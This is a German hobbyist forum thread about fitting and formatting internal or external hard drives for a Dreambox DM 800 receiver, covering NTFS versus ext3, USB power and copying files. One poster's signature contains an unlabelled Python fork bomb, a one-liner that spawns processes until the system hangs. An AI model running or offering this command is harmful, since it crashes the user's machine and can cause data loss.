int/ext HDD

• int/ext HDD

Hiho,

ich habe die DM 800 zZ ohne HDD.

1.

Ich würde gerne ein Platte einbauen, wie muss diese formatiert sein? Die, die ich im Auge habe, ist zZ. NTFS formatiert (hab das neuste Newnigma drauf).

- Geht das ohne Probleme (hab flüchtig gelesen, dass NTFS nicht mehr unterstützt wird)?

2.

ich habe ebenfalls eine ext 2,5" Platte. Wenn ich diese über USB an die DM anschließe, leutet auch die Lampe, die HDD wird aber im DeviceManager nicht erkannt.

- Muss die direkt dort auftauchen oder muss ich vorher noch was anderes machen (mounten)?

- Liegt es am NTFS oder doch am Strom? Würde es eigentlich gehen, wenn man die HDD an beide USB-Ports hängt (ohne aktiven HUB)?

Besten Dank.
      - Dreambox DM 800 S HD PVR
      - Onkyo TX NR 616
      - Philips 52 PFL 8605
      - Philips 42 PFL 7633

- Teufel Concept S +R (black)
      - PS3 Slim 120GB
    • Der USB Port der 800er liefert zu wenig STrom du solltest (musst) dir nen Hub kaufen !!!!!!!

Ich persönlich habe eine externe USB Platte dran find ich persönlich besser , und den sowieso schon so geringen Platz in der Box zum Atmen zu lassen :)

Sollte aber auch mit interner ohne Probleme laufen dafür ist es ja gebaut worden , ich nehme trotzdem lieber ne externe USB HDD ( habe 1 TB) ..

Ansonsten musst du für dich entscheiden was du willst ob intern oder extern !!

Formatieren würde ich in ext3 !!!!!!!

LG
    • shit, wie ich grad gesehen hab, ist die interne HDD, die ich hab, 3,5". damit fällt das dann wohl erstmal weg.

hmm, dann muss ich mir jetzt überlegen, intern (neue HDD kaufen), oder extern (aktiven HUB kaufen).

1. Aber NTFS stellt für die ext. HDD eigentlich kein Problem dar, oder?

2. Noch eine Frage, was bringt es mir, eine SD-Karte in die DM einzu"bauen"?

EDIT

3. würde es denn was bringen, wenn man zB folgendes Kabel verwendet, um die USB Platte über ESATA anzuschließen?

-> de.shopping.com/xPO-DeLock-DeL…nd-eSATA-Stecker-1m-84387
      - Dreambox DM 800 S HD PVR
      - Onkyo TX NR 616
      - Philips 52 PFL 8605
      - Philips 42 PFL 7633

- Teufel Concept S +R (black)
      - PS3 Slim 120GB

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von sc4ry ()

• Daten übertragen....

Hallo
      Habe schon längs eine eingebaute 320GB in mein 800-er, nun manche dateien ( Bluray`s) sind zu groß um per Netzwerk zu transferieren, deswegen werde die Externe HDD per USB anschliesen müssen um die Daten zu kopieren!
      Werde ( habe gehört) vorher die externe in NTFS formatieren, und dann ( die Frage) wie werde also die Daten von die interne auf die externe rüber kopieren?
      Danke
    • Mal so generell erwähnt ntfs bzw ntf3g auf der box ist ein userspace filesystem das sehr viel rechenleistung frisst und nur wenig performance bietet weil microsoft das nicht will.Für ext3 gibt es schon einiges für windows auch für das 7 und 64bit. :D
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo Leute,

falls das noch jemanden interessiert.

Habe seit letzter Woche ein 750GB interne 2,5'' HDD, brauchte nichst formatieren oder sonst was.
      Platte rein, initialisieren über Menü und fertig. Habe aktuellste stable drauf.

Greets

Peter
    • Also, ich komme trotzdem nicht zurecht; habe die externe per USB an Dream angeschlossen, die dateien ( was auf die externe sind) sind am Player zu sehen, aber wie gesagt, ich will die dateien was auf die interne drauf sind zu kopieren und auf die externe ( oder auf`n PC) rüber zu schieben....!
      Ich bräuchte teoretisch eine USB zu USB verbindungskabel, habe sowas nicht; wie dann?
      Danke
    • Original von niketm
      Also, ich komme trotzdem nicht zurecht; habe die externe per USB an Dream angeschlossen, die dateien ( was auf die externe sind) sind am Player zu sehen, aber wie gesagt, ich will die dateien was auf die interne drauf sind zu kopieren und auf die externe ( oder auf`n PC) rüber zu schieben....!
      Ich bräuchte teoretisch eine USB zu USB verbindungskabel, habe sowas nicht; wie dann?
      Danke

sowas sollte doch mit einem FTP-Programm funktionieren (total commander, filezilla etc.)
      "Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
      (Marie von Ebner-Eschenbach)
    • Tja; damit habe ich eh angefangt, nur wenn um`s über 50GB sich handelt, das kann ja dauern ( Stunden......!!!), deswegen habe mir gedacht eine verkabelung.....!
      Aber wie?

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von niketm ()